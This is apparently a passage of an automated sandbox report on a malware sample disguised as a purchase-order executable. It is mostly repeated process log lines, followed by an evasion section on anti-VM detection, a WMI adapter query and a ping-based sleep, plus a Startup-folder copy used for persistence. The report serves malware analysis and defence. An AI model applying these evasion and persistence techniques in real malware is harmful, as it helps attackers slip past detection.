Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 4052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 4930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 7F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 8F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 9110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: A110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: A4C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: B4C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 4A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 82C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 92C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: 94A0000 memory reserve \| memory write watch	Jump to behavior
